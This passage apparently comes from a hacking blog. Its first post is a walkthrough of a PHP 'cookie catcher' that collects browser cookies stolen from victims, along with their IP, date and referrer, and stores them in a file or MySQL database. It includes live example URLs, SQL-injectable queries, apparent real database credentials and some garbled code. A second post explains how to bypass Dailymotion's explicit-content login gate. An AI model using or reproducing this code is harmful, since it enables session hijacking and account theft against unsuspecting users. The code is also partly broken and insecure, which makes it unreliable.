$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);;
$refere$_SERVER['HTTP_REFERER'];
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Website: '.$referer.'


');
fclose($fp);
header (\"javascript:history.back()\");
?>





Now let's break that piece of code down:

Code





This tells the server that this piece of code up to the

Code

?>




is all php code.

Code

$cookie = $_GET['cookie'];




This gets the cookie from the web browser using php's GET statement.

Code

$ip = $_SERVER['REMOTE_ADDR'];
$date=date(“j F, Y, g:i a”);
$referer=$_SERVER['HTTP_REFERER'];




REMOTE_ADDR is the user's IP Address.
date is the date the cookie was taken.
HTTP_REFERER is the site the user came from.

Code

$fp = fopen('cookies.html' 'a');
fwrite($fp, ‘Cookie: ‘.$cookie.’
IP: ‘ .$ip. ‘
Date and Time: ‘ .$date. ‘
Website: ‘.$referer.’


’);
fclose($fp);




This piece of code does a couple of things. First is opens a file called cookies.html on the server. Then it writes the cookie info to the file (Cookie it's self, date, and website the person came from). After that it adds three returns (
). Next it closes the file cookies.html.

Code

header (\"javascript:history.back()\");




This last piece of code sends the user back to the last page they were on before they clicked on the link.

Code

?>




This, like stated earlier, ends the php script.

There it is! You've made your very own cookie catcher for stealing cookies from people's browsers!

Example Script:[/b}

An example of this script in action is:

http://www.bluechill.co.cc/cookietest.php

http://www.bluechill.co.cc/cookies.php (view the cookies you've had from bluechill.co.cc in the last day.

It only shows cookies from your IP.


Have fun with your new found cookie catcher!

[b]Extras:

Here is the source code for those pages (including a mysql database ;) )

Cookietest.php:

Code

setcookie(\"Test\",\"Test Cookie For Cookie Catcher\",time()+3600);
echo \"Test Cookie: \";
echo $_COOKIE[\"Test\"];
echo \"
\";
?>

document.write(\"
Code

$ip = $_SERVER['REMOTE_ADDR'];
$con = mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");
$db = mysql_select_db(\"TABLENAME\");
$result = mysql_query(\"SELECT * FROM cookies WHERE IP = '$ip'\");
$i = 0;
while($row = mysql_fetch_array($result))
{
   echo \"Cookie \" . $i . \"

\";
   echo \"Cookies: \" . $row['Cookies'] . \"
Site: \" . $row['Site'] . \"
Date: \" . $row['Date'] . \"
Your IP: \" . $row['IP'] . \"

\";
   echo \"
\";
   $i++;
}
mysql_close($con);
?>





Cookiecatcher:
Code

$cookie = $_GET['cookie'];
$ip = $_SERVER['REMOTE_ADDR'];
$date=date(\"Y-m-d\");
$referer=$_SERVER['HTTP_REFERER'];
mysql_connect(\"localhost\", \"USERNAME\", \"PASSWORD\");
mysql_select_db(\"TABLENAME\");
$sql_query = mysql_query(\"INSERT INTO cookies (Cookies,Site,Date,IP) VALUES ('$cookie','$referer','$date','$ip')\");
echo \"Cookie Entered Successfully\";
?>





Code for resetting database:
Code

   $con = mysql_connect(\"localhost\", \"bluechil_admin\", \"TonyHawk\");
   $db = mysql_select_db(\"bluechil_cookies\");
   $query = mysql_query(\"TRUNCATE TABLE cookies\");
   mysql_close($con);
   echo \"Table Reset!\";
?>





Have fun! :)

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:

By-pass Dailymotion explicit content filter

?
If you want to watch an "explicit content" video at www.dailymotion.com but don't feel like creating a user just for that reason, here's what you do.

1. Go to the page that contains the video you want to see.

2. In the URL, replace the part that says "www" with "iphone".

For instance:
before: http://www.dailymotion.com/video/bla-bla-bla
after: http://iphone.dailymotion.com/video/bla-bla-bla

Now you'll have access to the iphone version of that same page. It's what you would see if you navigate to the first URL using an iPhone or iPod Touch.

3. Double click on the video thumbnail. This makes the video start loading. You might have to double click the image again to make it play.

4. Alternate between "play" and "pause" by double clicking the image.

That's all nice and good, but the problem is that the video box is super tiny. No problem! Keep reading...

5. Open "firebug".

6. Run a search or manually find the following code snippet "embed width=100" (without the "quotes").

7. Modify the width and height to be 1000 and 800 or something big like that.

8. Enjoy! (Note that this will show the video's original size and not stretched. It might be smaller than the regular non-iphone version of the page).

***Alternate Way***

Do steps 1 and 2.

3. View the source code for that page.

4. Run a search for the keyword "auth" (without the "quotes"). If should only throw back one result.

5. Copy the whole string that contains that keyword. It should look something like:
http://proxy-63.dailymotion.com/video/538/713/21317835%3amp4_h264_aac.mp4?auth=1285078599-2ffdec30914540f317ce830fa9146425&cache=0
This link is NSFW!!

6. Paste that URL in a new tab.

This will get you a page that only contains the video. The beauty of it is that you can just go to "File - Save as" and download the file to your hard drive.
Note: If you erase the question mark and everything else after it in the step 5 URL, you won't be able to access the site as you don't have permish. I don't know if these tokens expire, so it could be probable that the above link would throw a 403 or 404 Status Code by the time you read this article.


Moral of the story 1: You don't have to be an elite hacker to bend a site into doing what you want.
Moral of the story 2: Even huge sites like Dailymotion have these stupid holes that allow users to get access to things they only want logged users to see.

Keep Rocking, Keep Hacking

Posted by alphajatin 0 comments
Labels:
Subscribe to: Posts (Atom)